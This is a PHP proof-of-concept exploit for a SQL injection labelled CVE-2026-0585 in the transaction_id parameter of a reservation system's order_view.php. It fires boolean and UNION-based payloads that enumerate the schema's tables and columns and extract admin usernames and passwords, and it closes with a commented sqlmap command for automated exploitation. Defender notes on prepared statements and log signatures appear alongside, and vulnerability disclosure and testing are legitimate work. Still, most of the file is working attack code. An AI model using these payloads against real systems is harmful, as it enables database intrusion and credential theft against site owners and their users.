<?php
// CVE-2026-0585 SQL Injection PoC
// Target: code-projects Online Product Reservation System 1.0
// File: /order_view.php
// Parameter: transaction_id
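// Verification harness for the transaction_id parameter of /order_view.php.
// It replays a fixed list of probe values as GET requests and prints, for each
// one, the HTTP status and the response body length so the results can be
// compared by hand. Nothing is parsed out of the response body.
//
// Defender notes:
// - The vulnerable query itself is not shown here. The usual fix for this class
//   of bug is to bind transaction_id as a parameter of a prepared statement
//   (PDO or mysqli) instead of concatenating it into the SQL text.
// - Every probe is a GET, so it appears in the web server access log as a
//   request to order_view.php whose transaction_id contains a URL-encoded
//   quote followed by AND/UNION SELECT/information_schema.
// - After patching, the two boolean probes should return the same status and
//   the same body length.

// HTTP Basic credentials attached to every request (placeholder values).
// The target URL below is plain http://, so these travel base64-encoded but
// unencrypted. NOTE(review): whether the application really uses HTTP Basic
// rather than a session login is not visible here.
$user = 'admin';
$pass = 'password';

// Endpoint under test (placeholder host).
$target = 'http://target.com/order_view.php';

// Probe values. The functions used (version(), user(), database()) and
// information_schema are MySQL-style. The UNION probes assume the underlying
// SELECT returns eight columns; this script does not verify that.
$payloads = [
    // Boolean pair: an always-true and an always-false condition. A difference
    // in status or body length between the two is the signal.
    "1' AND 1=1 -- -",
    "1' AND 1=2 -- -",
    // Union with eight numeric markers (checks the assumed column count).
    "1' UNION SELECT 1,2,3,4,5,6,7,8 -- -",
    // Server version, database account and current schema name.
    "1' UNION SELECT NULL,version(),user(),database(),NULL,NULL,NULL,NULL -- -",
    // Lists every table name in the current schema, not only a users table.
    "1' UNION SELECT NULL,table_name,NULL,NULL,NULL,NULL,NULL,NULL FROM information_schema.tables WHERE table_schema=database() -- -",
    // Column names of a table called `users`; the table name is an assumption.
    "1' UNION SELECT NULL,column_name,NULL,NULL,NULL,NULL,NULL,NULL FROM information_schema.columns WHERE table_name='users' -- -",
    // Assumes columns username, password and role exist on that table.
    "1' UNION SELECT NULL,username,password,NULL,NULL,NULL,NULL,NULL FROM users WHERE role='admin' -- -"
];

foreach ($payloads as $payload) {
    $url = $target . '?transaction_id=' . urlencode($payload);

    $ch = curl_init();
    if ($ch === false) {
        // Without a handle there is nothing to measure; do not print a
        // misleading "0 bytes" line.
        echo "[!] curl_init() failed\n\n";
        continue;
    }

    curl_setopt_array($ch, [
        CURLOPT_URL            => $url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_USERPWD        => "$user:$pass",
        CURLOPT_HTTPAUTH       => CURLAUTH_BASIC,
        CURLOPT_TIMEOUT        => 30,
    ]);

    $response  = curl_exec($ch);
    $httpCode  = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    $curlError = curl_error($ch);
    curl_close($ch);

    echo "[*] Payload: $payload\n";

    if ($response === false) {
        // curl_exec() returns false on a transport failure (DNS, refused
        // connection, timeout). Report it as a failure, because an HTTP code of
        // 0 with length 0 would otherwise look like an empty, "clean" response.
        echo "[!] Request failed: $curlError\n\n";
        continue;
    }

    echo "[*] HTTP Code: $httpCode\n";
    echo "[*] Response Length: " . strlen($response) . " bytes\n\n";
}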
// SQLMap command for automated exploitation
// sqlmap -u "http://target.com/order_view.php?transaction_id=1" --batch --level=5 --risk=3
?>